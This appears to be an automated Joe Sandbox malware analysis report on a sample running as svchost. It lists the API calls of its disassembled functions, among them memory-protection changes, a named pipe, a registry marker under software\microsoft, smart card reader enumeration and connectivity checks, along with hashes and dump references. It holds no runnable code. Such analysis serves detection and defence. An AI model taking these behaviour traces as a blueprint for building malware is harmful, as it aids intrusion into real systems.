                                                                                                                                                                                                            • VirtualProtect.KERNEL32(?,00000000,02C8839A,?,?,?,?,?,?,?,02C8839A,00000000,02C881F0,02CC7D6C), ref: 02C89106
                                                                                                                                                                                                              • Part of subcall function 02C89130: WaitForSingleObject.KERNEL32(?,000003E8,00000000,02C89113,?,?,?,?,?,?,02C8839A,00000000,02C881F0,02CC7D6C), ref: 02C8913C
                                                                                                                                                                                                              • Part of subcall function 02C89130: GetProcessHeap.KERNEL32(00000008,00000030,?,?,?,?,?,?,02C8839A,00000000,02C881F0,02CC7D6C), ref: 02C89146
                                                                                                                                                                                                              • Part of subcall function 02C89130: HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,02C8839A,00000000,02C881F0,02CC7D6C), ref: 02C8914D
                                                                                                                                                                                                              • Part of subcall function 02C89130: memset.MSVCRT ref: 02C8915E
                                                                                                                                                                                                              • Part of subcall function 02C89130: ReleaseMutex.KERNEL32(?,?,?,?,?,?,?,02C8839A,00000000,02C881F0,02CC7D6C), ref: 02C891AA
                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(00000000,00000000,7556F550,00000000,76C0BD50,?,?,?,02C8839A,00000000,02C881F0,02CC7D6C), ref: 02C89117
                                                                                                                                                                                                            • FlushInstructionCache.KERNEL32(00000000,?,?,?,02C8839A,00000000,02C881F0,02CC7D6C), ref: 02C8911E
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Virtual$Protect$AllocHeapProcess$CacheCurrentFlushInstructionMutexObjectReleaseSingleWaitmemcpymemset
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2609073853-0
                                                                                                                                                                                                            • Opcode ID: 8f021d533cd75e031d93a37704bb4763fec1ccb5118302501cceb90092ad35a6
                                                                                                                                                                                                            • Instruction ID: 7690c3e9f1e6a4d59b50bc6c9277e97bcbfb76cd1f993ad7a093bdfbb91cb0f5
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8f021d533cd75e031d93a37704bb4763fec1ccb5118302501cceb90092ad35a6
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 22410072A40216B7CB10AE788C88FBB777AEF94258F448619F94597384DB35E901C7E0
                                                                                                                                                                                                            Function 02C973C0 Relevance: 10.6, APIs: 7, Instructions: 75memoryCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,0006AFB0,00000000,00000000,00000000,?,02C97874,00000000,00140B17), ref: 02C973D5
                                                                                                                                                                                                            • RtlAllocateHeap.NTDLL(00000000,?,02C97874,00000000,00140B17), ref: 02C973DC
                                                                                                                                                                                                            • memset.MSVCRT ref: 02C973EF
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,02C97870,?,02C97874,00000000,00140B17), ref: 02C9749E
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000,?,02C97874,00000000,00140B17), ref: 02C974A1
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,?,02C97874,00000000,00140B17), ref: 02C974AD
                                                                                                                                                                                                            • RtlFreeHeap.NTDLL(00000000,?,02C97874,00000000,00140B17), ref: 02C974B0
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$Process$AllocateFreeValidatememset
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 219023833-0
                                                                                                                                                                                                            • Opcode ID: ee46b0cd924f0b3656249b19cb5aba9a251340cd2f2c060f71cc093169004b01
                                                                                                                                                                                                            • Instruction ID: bcd05b34dfdb7e001c00c32e838f1f62bc3ad5fa811ead47d707cc04517c8152
                                                                                                                                                                                                            • Opcode Fuzzy Hash: ee46b0cd924f0b3656249b19cb5aba9a251340cd2f2c060f71cc093169004b01
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6421EFB0A017009FCB21AFA5D888ACBFFE8FF4A744B00881DE55E8B201C734A405CF92
                                                                                                                                                                                                            Function 00402240 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 74filetimeCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • CreateFileA.KERNEL32(\\.\pipe\acsipc_server,C0000000,00000003,?,00000003,80000080,00000000,00000000), ref: 004022D6
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,D48A445E,00000028,?,00000000), ref: 004022F6
                                                                                                                                                                                                            • GetSystemTimeAsFileTime.KERNEL32(?), ref: 004022FC
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,B5CB6C63,0000001C,?,00000000), ref: 0040231A
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0040231D
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2676559004.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2676559004.000000000045B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: File$TimeWrite$CloseCreateHandleSystem
                                                                                                                                                                                                            • String ID: \\.\pipe\acsipc_server
                                                                                                                                                                                                            • API String ID: 3225117150-898603304
                                                                                                                                                                                                            • Opcode ID: f30bb11f5613f8d38f8c23486348982fdc31315c85d836d9b114ebf2302f727f
                                                                                                                                                                                                            • Instruction ID: c460779fd0431372b53d2531d074c5320f53f755a2dac54515a3a2487e8d4eb8
                                                                                                                                                                                                            • Opcode Fuzzy Hash: f30bb11f5613f8d38f8c23486348982fdc31315c85d836d9b114ebf2302f727f
                                                                                                                                                                                                            • Instruction Fuzzy Hash: DA31F4B1C0121CAFDB10DFD5D985AEEFBB8FB48314F10422AE614BB280D7B41A458F95
                                                                                                                                                                                                            Function 02C76930 Relevance: 10.6, APIs: 7, Instructions: 64memoryCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                              • Part of subcall function 02C76570: CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,?,?,02C86BCC,?,00000000), ref: 02C76596
                                                                                                                                                                                                              • Part of subcall function 02C76570: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,02C86BCC,?,00000000), ref: 02C765B7
                                                                                                                                                                                                              • Part of subcall function 02C76570: GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,02C86BCC,?,00000000), ref: 02C765DD
                                                                                                                                                                                                              • Part of subcall function 02C76570: RtlAllocateHeap.NTDLL(00000000,?,?,?,?,?,02C86BCC,?,00000000), ref: 02C765E4
                                                                                                                                                                                                              • Part of subcall function 02C76570: memset.MSVCRT ref: 02C765F4
                                                                                                                                                                                                              • Part of subcall function 02C76570: ReadFile.KERNEL32(00000000,00000000,?,00000000,00000000,?,?,?,?,?,02C86BCC,?), ref: 02C76616
                                                                                                                                                                                                              • Part of subcall function 02C76570: GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,02C86BCC,?), ref: 02C76622
                                                                                                                                                                                                              • Part of subcall function 02C76570: HeapValidate.KERNEL32(00000000,?,?,?,?,?,02C86BCC,?), ref: 02C76629
                                                                                                                                                                                                              • Part of subcall function 02C76570: GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,02C86BCC,?), ref: 02C76636
                                                                                                                                                                                                              • Part of subcall function 02C76570: HeapFree.KERNEL32(00000000,?,?,?,?,?,02C86BCC,?), ref: 02C7663D
                                                                                                                                                                                                              • Part of subcall function 02C76570: GetHandleInformation.KERNEL32(00000000,00000000), ref: 02C7665D
                                                                                                                                                                                                              • Part of subcall function 02C76570: CloseHandle.KERNEL32(00000000), ref: 02C7666E
                                                                                                                                                                                                              • Part of subcall function 02C76570: IsBadWritePtr.KERNEL32(?,00000004), ref: 02C7667E
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,00000013,?,00000000,00000000,00000000,75495CE0,02C82897), ref: 02C7696C
                                                                                                                                                                                                            • RtlAllocateHeap.NTDLL(00000000), ref: 02C76973
                                                                                                                                                                                                            • memset.MSVCRT ref: 02C76983
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,75495CE0,02C82897), ref: 02C769A5
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 02C769A8
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C769B5
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 02C769B8
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$Process$File$AllocateFreeHandleValidatememset$CloseCreateInformationReadSizeWrite
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3393195770-0
                                                                                                                                                                                                            • Opcode ID: f377347343ddea82a5b582f989365a99ecd9eccaf66547f3de79fc0db7b6716e
                                                                                                                                                                                                            • Instruction ID: 58932f77280adc2f93b47e823172b600c7e8a6d5802ac6a8ee26dcbea9958889
                                                                                                                                                                                                            • Opcode Fuzzy Hash: f377347343ddea82a5b582f989365a99ecd9eccaf66547f3de79fc0db7b6716e
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5511E572F41658A7C725ABA5AC48F9BB76CDFC0B55F140168B909D7280DB70DE14CBE0
                                                                                                                                                                                                            Function 02C737C0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 35registryCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • RegOpenKeyExA.KERNEL32(80000001,software\microsoft,00000000,00000102,?,?,?,02C73A91,?), ref: 02C737E0
                                                                                                                                                                                                            • RegSetValueExA.KERNEL32(00000000,92f35d9aa,00000000,00000004,?,00000004,?,?,02C73A91,?), ref: 02C737FC
                                                                                                                                                                                                            • RegFlushKey.ADVAPI32(00000000,?,?,02C73A91,?), ref: 02C7380A
                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(00000000,?,?,02C73A91,?), ref: 02C73818
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CloseFlushOpenValue
                                                                                                                                                                                                            • String ID: 92f35d9aa$software\microsoft
                                                                                                                                                                                                            • API String ID: 2510291871-309072765
                                                                                                                                                                                                            • Opcode ID: e63f04f99148dba3b6b7ab9b68f6be2725fa1b7d9692b7ea7081e9efd6cc894c
                                                                                                                                                                                                            • Instruction ID: 4ccb169730d5804e2a1c6b65925daf7e587f849852541bb732c89dd95e9780d8
                                                                                                                                                                                                            • Opcode Fuzzy Hash: e63f04f99148dba3b6b7ab9b68f6be2725fa1b7d9692b7ea7081e9efd6cc894c
                                                                                                                                                                                                            • Instruction Fuzzy Hash: C3F030B5E80248FBE711CA91DD49FAA776CDF04B44F108699FA01E7140D770EA10A7A5
                                                                                                                                                                                                            Function 02C97A50 Relevance: 10.1, APIs: 8, Instructions: 95memoryCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?,00000000,?,00000000,00000000,00000000), ref: 02C97AB6
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 02C97ABD
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 02C97ACA
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 02C97AD1
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?,00000000,?,00000000,00000000,00000000), ref: 02C97AE0
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 02C97AE3
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 02C97AF0
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 02C97AF3
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$Process$FreeValidate
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1670920773-0
                                                                                                                                                                                                            • Opcode ID: d57ac4135c724d8a926893770527e68ed6947d970c3d55a6b6301d0a02dcde21
                                                                                                                                                                                                            • Instruction ID: e3683514777bb9f53f8e9e1f0d5adb4f683b40bf835c875ad3306b9d633f3255
                                                                                                                                                                                                            • Opcode Fuzzy Hash: d57ac4135c724d8a926893770527e68ed6947d970c3d55a6b6301d0a02dcde21
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1631A171E41344ABDF219F69D848BAABBA8EF84314F048589ED0597246CB30DA55CBA0
                                                                                                                                                                                                            Function 02C97C50 Relevance: 10.1, APIs: 8, Instructions: 56COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: 0dd9ec387ed50701c1fc429e50d7aecad2cca295a24366175ec6721f5963fe5a
                                                                                                                                                                                                            • Instruction ID: 73522fa695af89b9d5c86362f02695eeb83cddf8a9cdd84c04c25d852f89536d
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0dd9ec387ed50701c1fc429e50d7aecad2cca295a24366175ec6721f5963fe5a
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 080128B2F89A446BEB216BA5FD8CF27BB5CEF80B55F044622F50597140C7319410CAB0
                                                                                                                                                                                                            Function 02C96E90 Relevance: 9.1, APIs: 6, Instructions: 108fileCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,?,00000000), ref: 02C96ED4
                                                                                                                                                                                                            • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,?,?,02C97817), ref: 02C96EEE
                                                                                                                                                                                                            • memcpy.MSVCRT(00000000,?,?,?,02C97817), ref: 02C96F16
                                                                                                                                                                                                            • UnmapViewOfFile.KERNEL32(?,?,?,?,?,02C97817), ref: 02C96F22
                                                                                                                                                                                                              • Part of subcall function 02C93E00: GetHandleInformation.KERNEL32(?,00000000), ref: 02C93E14
                                                                                                                                                                                                              • Part of subcall function 02C93E00: CloseHandle.KERNEL32(?), ref: 02C93E25
                                                                                                                                                                                                            • memcpy.MSVCRT(?,?,00140B17,00000000,00000000,00140B17,?,02C97817), ref: 02C96F4E
                                                                                                                                                                                                            • WriteFile.KERNEL32(?,?,00140B17,02C97817,00000000,00140B17), ref: 02C96F80
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: File$HandleViewmemcpy$CloseCreateInformationMappingUnmapWrite
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3741995677-0
                                                                                                                                                                                                            • Opcode ID: 561877f762b3af474279e7b969587dc2b61f0120eba24ebd6a8ae1e641869784
                                                                                                                                                                                                            • Instruction ID: da0cf13bb213f9a11f149eb5d0aceba496568976ad3535ebd0d50bc920cc0354
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 561877f762b3af474279e7b969587dc2b61f0120eba24ebd6a8ae1e641869784
                                                                                                                                                                                                            • Instruction Fuzzy Hash: D9317C72A00209BBDB04DF99D884B6AF7BCFF58714F20825AE90497680D771AE60CBD0
                                                                                                                                                                                                            Function 02C93D20 Relevance: 9.1, APIs: 6, Instructions: 87COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • SCardEstablishContext.WINSCARD(00000002,00000000,00000000,02C856A3,00000000), ref: 02C93D45
                                                                                                                                                                                                            • SCardListReadersA.WINSCARD(02C856A3,00000000,?,FFFFFFFF), ref: 02C93D5C
                                                                                                                                                                                                            • SCardConnectA.WINSCARD(02C856A3,?,00000002,00000003,?,?), ref: 02C93D8E
                                                                                                                                                                                                            • SCardFreeMemory.WINSCARD(02C856A3,?), ref: 02C93DC9
                                                                                                                                                                                                            • SCardReleaseContext.WINSCARD(?), ref: 02C93DDD
                                                                                                                                                                                                            • SCardReleaseContext.WINSCARD(02C856A3), ref: 02C93DE7
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Card$Context$Release$ConnectEstablishFreeListMemoryReaders
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 4220388116-0
                                                                                                                                                                                                            • Opcode ID: 573c72c4a9e818c6aef5024e680623d5f20106d5fc941ccebf31bba1b295727c
                                                                                                                                                                                                            • Instruction ID: c89187b9411d758a93a7aa6bb40e3e85a88ed30e947d8ebbc6ad705c09c80665
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 573c72c4a9e818c6aef5024e680623d5f20106d5fc941ccebf31bba1b295727c
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 12310F76E10259ABDF21CF99C858BEEB7BDEF84604F144689E915E7240D770AB04CBA0
                                                                                                                                                                                                            Function 02C73750 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 37registryCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • RegOpenKeyExA.KERNEL32(80000001,software\microsoft,00000000,00000101,?,02C73A83), ref: 02C73784
                                                                                                                                                                                                            • RegQueryValueExA.KERNEL32(00000000,92f35d9aa,00000000,?,00000000,?), ref: 02C737A5
                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 02C737B3
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CloseOpenQueryValue
                                                                                                                                                                                                            • String ID: 92f35d9aa$software\microsoft
                                                                                                                                                                                                            • API String ID: 3677997916-309072765
                                                                                                                                                                                                            • Opcode ID: 438c0b29fcafb0ee7a2b4f30c94ef07994edde75fffedb93b7823bde09dc40ab
                                                                                                                                                                                                            • Instruction ID: 39ce229bfdeca4e4d3475bb05b3248a25564608a45d619c53a4a46de025325d0
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 438c0b29fcafb0ee7a2b4f30c94ef07994edde75fffedb93b7823bde09dc40ab
                                                                                                                                                                                                            • Instruction Fuzzy Hash: ADF03CB4E40248FBEB00CF94DD45FEEBBBCEB08704F104699EA05E7280D7B5A6048B94
                                                                                                                                                                                                            Function 02C97130 Relevance: 7.6, APIs: 5, Instructions: 85timeCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetFileType.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,02C97604), ref: 02C97163
                                                                                                                                                                                                            • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,0000002C,00000044,00000030,0000003C,?,?,?,?,?,?,?,02C97604), ref: 02C9718B
                                                                                                                                                                                                            • GetLocalTime.KERNEL32(?,?,?,?,?,?,?,?,02C97604), ref: 02C971B5
                                                                                                                                                                                                            • SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,02C97604), ref: 02C971C3
                                                                                                                                                                                                            • FileTimeToDosDateTime.KERNEL32(?,02C97604,?), ref: 02C971D5
                                                                                                                                                                                                              • Part of subcall function 02C96C70: GetFileType.KERNEL32(?,00000000,00000000), ref: 02C96C79
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: FileTime$Type$DateLocalPointerSystem
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 60630809-0
                                                                                                                                                                                                            • Opcode ID: 518137f2a91d0527747787b4f28273167a0e4f474879d59b772cf3842829abf8
                                                                                                                                                                                                            • Instruction ID: d1af3c16b96baf0a17358377f1a509a5044f62bde0d5554f7e539b76d6eef2d2
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 518137f2a91d0527747787b4f28273167a0e4f474879d59b772cf3842829abf8
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8B2171B29017449FC721CF6AD9C49ABFBFCFB88214B500A6EE59AC3940D771E508CB20
                                                                                                                                                                                                            Function 02C763B0 Relevance: 7.6, APIs: 5, Instructions: 81sleepthreadCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • memset.MSVCRT ref: 02C763D0
                                                                                                                                                                                                              • Part of subcall function 02C83D90: IsNetworkAlive.SENSAPI(02C763DD,00000000), ref: 02C83DA3
                                                                                                                                                                                                              • Part of subcall function 02C83D90: IsUserAnAdmin.SHELL32 ref: 02C83DB1
                                                                                                                                                                                                              • Part of subcall function 02C83D90: DnsFlushResolverCache.DNSAPI ref: 02C83DBB
                                                                                                                                                                                                              • Part of subcall function 02C83D90: memset.MSVCRT ref: 02C83DD8
                                                                                                                                                                                                              • Part of subcall function 02C83D90: lstrcpynA.KERNEL32(00000000,http://,00000104,?,00000000,00000000), ref: 02C83DF7
                                                                                                                                                                                                              • Part of subcall function 02C83D90: StrNCatA.SHLWAPI(00000000,www.bing.com,00000104), ref: 02C83E10
                                                                                                                                                                                                              • Part of subcall function 02C83D90: InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02C83E23
                                                                                                                                                                                                              • Part of subcall function 02C83D90: memset.MSVCRT ref: 02C83E3C
                                                                                                                                                                                                              • Part of subcall function 02C83D90: lstrcpynA.KERNEL32(00000000,http://,00000104,?,?,?,?,00000000,00000000), ref: 02C83E55
                                                                                                                                                                                                              • Part of subcall function 02C83D90: StrNCatA.SHLWAPI(00000000,www.microsoft.com,00000104), ref: 02C83E68
                                                                                                                                                                                                              • Part of subcall function 02C83D90: InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02C83E75
                                                                                                                                                                                                            • Sleep.KERNEL32(000001F4,?,75570F10,00000000), ref: 02C763EC
                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,02C76060,00000000,00000000,00000000), ref: 02C76448
                                                                                                                                                                                                            • WaitForMultipleObjects.KERNEL32(00000040,?,00000001,000000FF,00000000,?,75570F10,00000000), ref: 02C76470
                                                                                                                                                                                                            • CloseHandle.KERNEL32(?,?,75570F10,00000000), ref: 02C76488
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: memset$CheckConnectionInternetlstrcpyn$AdminAliveCacheCloseCreateFlushHandleMultipleNetworkObjectsResolverSleepThreadUserWait
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2160739018-0
